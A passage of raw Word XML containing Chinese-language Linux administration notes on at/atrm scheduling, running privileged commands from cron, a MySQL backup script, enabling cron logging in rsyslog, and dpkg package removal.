          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="000E1D9E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示任务号</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEBDDFB" w14:textId="77777777" w:rsidR="000E1D9E" w:rsidRPr="005C4CEB" w:rsidRDefault="000E1D9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01D609FF" w14:textId="2DE88B75" w:rsidR="007521F2" w:rsidRDefault="007521F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4A375C" w14:textId="096B319A" w:rsidR="007521F2" w:rsidRDefault="007521F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rm</w:t>
      </w:r>
      <w:r w:rsidR="00CC5808">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00CC5808">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r w:rsidR="00CC5808">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00CC5808">
        <w:t xml:space="preserve">trm 2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D9FCBD" w14:textId="59C1AD1C" w:rsidR="007521F2" w:rsidRDefault="007521F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="761AEBD4" w14:textId="77777777" w:rsidR="007521F2" w:rsidRDefault="007521F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C5098BE" w14:textId="77777777" w:rsidR="001051F0" w:rsidRDefault="001051F0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43E4F19C" w14:textId="77777777" w:rsidR="003A666C" w:rsidRDefault="003A666C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>案例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>天后的下午</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> /bin/ls /hom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4115D586" w14:textId="77777777" w:rsidR="003A666C" w:rsidRDefault="003A666C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1202616F" w14:textId="0514B466" w:rsidR="000F72A7" w:rsidRDefault="003A666C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>at 5pm + 2 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D300F14" w14:textId="2793FF66" w:rsidR="003A666C" w:rsidRDefault="003A666C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D8A98F9" w14:textId="4F2ADA4D" w:rsidR="003A666C" w:rsidRDefault="003A666C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A05A300" w14:textId="42D0AE3B" w:rsidR="0014046E" w:rsidRDefault="0014046E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>明天</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>7:00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>干什么</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0C2786" w14:textId="7359980B" w:rsidR="003A666C" w:rsidRDefault="0014046E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>t 5pm tomorrow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233C6F6E" w14:textId="608B90AC" w:rsidR="003A666C" w:rsidRDefault="003A666C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6539FBC9" w14:textId="7C7D3E09" w:rsidR="003A666C" w:rsidRDefault="003A666C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BC1CE50" w14:textId="77777777" w:rsidR="003A666C" w:rsidRDefault="003A666C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17E6265E" w14:textId="77777777" w:rsidR="000F72A7" w:rsidRDefault="000F72A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27F8A335" w14:textId="77777777" w:rsidR="000F72A7" w:rsidRPr="000F72A7" w:rsidRDefault="000F72A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7743D057" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>定时任务中如果需要执行高权限命令通用做法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9C8E7D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有这么几种方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34135F66" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行该脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663FADFC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过一些配置，使本普通用户的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>免密，然后在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crontab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的脚本中，在高权限命令前加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。对于该脚本而言，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后所有的运行权限就都是高权限了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340285E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FD78ADD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参见鹏哥的某</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF736F8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo mysqldump --column-statistics=0  -uroot -P23306 -p${password} -h192.168.3.199 -d sca bom component \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2904BD82" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    component_analysis_cache component_vulnerability cpe finding_attribution project &gt; ${database_dir}sca-init-database-${currentTime}.sq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E6EFFB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>修改权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77913C28" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>chown -R ftpuser:ftpuser ${database_dir}sca-database-${currentTime}.sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BDD1C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>chown -R ftpuser:ftpuser ${database_dir}sca-init-database-${currentTime}.sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222593E4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># remove old sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A74814" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>rm -rf ${database_dir}sca-database-${yesterday}.sql ${database_dir}sca-init-database-${yesterday}.sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A84EE39" w14:textId="73BDAE2C" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CB3E169" w14:textId="77777777" w:rsidR="007D4C59" w:rsidRDefault="007D4C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A55C4D7" w14:textId="77777777" w:rsidR="007D4C59" w:rsidRDefault="007D4C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="727211B4" w14:textId="77777777" w:rsidR="007D4C59" w:rsidRDefault="007D4C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D1E2938" w14:textId="77777777" w:rsidR="007D4C59" w:rsidRDefault="007D4C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29200284" w14:textId="77777777" w:rsidR="007D4C59" w:rsidRDefault="007D4C59" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crontab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0D4C22" w14:textId="77777777" w:rsidR="007D4C59" w:rsidRDefault="007D4C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虽然</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>journal</w:t>
      </w:r>
      <w:r>
        <w:t>ctl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crontab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的运行日志，但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crontab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本身也有配置日志，默认不开启。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352E8773" w14:textId="77777777" w:rsidR="007D4C59" w:rsidRDefault="007D4C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="550F0B1C" w14:textId="77777777" w:rsidR="007D4C59" w:rsidRDefault="007D4C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2A2430" w14:textId="77777777" w:rsidR="007D4C59" w:rsidRDefault="007D4C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14BB1850" w14:textId="77777777" w:rsidR="007D4C59" w:rsidRDefault="007D4C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">vim /etc/rsyslog.d/50-default.conf </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A0647D" w14:textId="77777777" w:rsidR="007D4C59" w:rsidRDefault="007D4C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将下面这行前面的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去掉即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3C0EC9" w14:textId="77777777" w:rsidR="007D4C59" w:rsidRDefault="007D4C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>cron.* /var/log/cron.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57102D21" w14:textId="77777777" w:rsidR="007D4C59" w:rsidRDefault="007D4C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22A02B6C" w14:textId="77777777" w:rsidR="007D4C59" w:rsidRDefault="007D4C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>随后可以在</w:t>
      </w:r>
      <w:r>
        <w:t>/var/log/cron.log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中看到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的日志。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AE9F4E" w14:textId="77777777" w:rsidR="007D4C59" w:rsidRDefault="007D4C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60CEA3E2" w14:textId="77777777" w:rsidR="007D4C59" w:rsidRDefault="007D4C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D0B25AA" w14:textId="3B661AD0" w:rsidR="007D4C59" w:rsidRDefault="00486DBA" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crontab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的虚拟环境？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342F26EE" w14:textId="77777777" w:rsidR="007D4C59" w:rsidRDefault="007D4C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C79AE62" w14:textId="0F941F67" w:rsidR="00486DBA" w:rsidRDefault="00486DBA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r w:rsidR="00FD4ECA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conda</w:t>
      </w:r>
      <w:r w:rsidR="00FD4ECA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一节中该问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C49312C" w14:textId="77777777" w:rsidR="00486DBA" w:rsidRDefault="00486DBA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42986B76" w14:textId="77777777" w:rsidR="00486DBA" w:rsidRDefault="00486DBA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ECFB78F" w14:textId="5DD4FBA6" w:rsidR="008A0780" w:rsidRDefault="00FD3D1D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="263" w:name="_Toc159779723"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dpkg</w:t>
      </w:r>
      <w:r w:rsidR="0059669F">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="0059669F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卸载、安装、清理无效</w:t>
      </w:r>
      <w:r w:rsidR="000B3B19">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>依赖</w:t>
      </w:r>
      <w:bookmarkEnd w:id="263"/>
    </w:p>
    <w:p w14:paraId="217D7CDB" w14:textId="662B9AA0" w:rsidR="00FD3D1D" w:rsidRDefault="00FD3D1D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31D7C764" w14:textId="1A973986" w:rsidR="00FD3D1D" w:rsidRDefault="00FD3D1D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dpkg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>deb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>dpkg -i *.deb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560D0DCC" w14:textId="533DA050" w:rsidR="00207122" w:rsidRDefault="00207122" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dpkg</w:t>
      </w:r>
      <w:r w:rsidR="00001C55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卸载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>deb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>dpkg -</w:t>
      </w:r>
      <w:r w:rsidR="00001C55">
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> *.deb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE932BA" w14:textId="60815607" w:rsidR="00FD3D1D" w:rsidRDefault="00821BA9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00821BA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dpkg -l</w:t>
      </w:r>
      <w:r w:rsidRPr="00821BA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来查看软件的状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCE383D" w14:textId="733225AF" w:rsidR="00821BA9" w:rsidRDefault="00821BA9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00821BA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选择</w:t>
      </w:r>
      <w:r w:rsidRPr="00821BA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00502CF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>dpkg -P</w:t>
      </w:r>
      <w:r w:rsidRPr="00502CF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>来卸载软件</w:t>
      </w:r>
      <w:r w:rsidRPr="00821BA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00502CF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>dpkg --remove</w:t>
      </w:r>
      <w:r w:rsidRPr="00502CF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>只是删除安装的文件，但不删除配置文件</w:t>
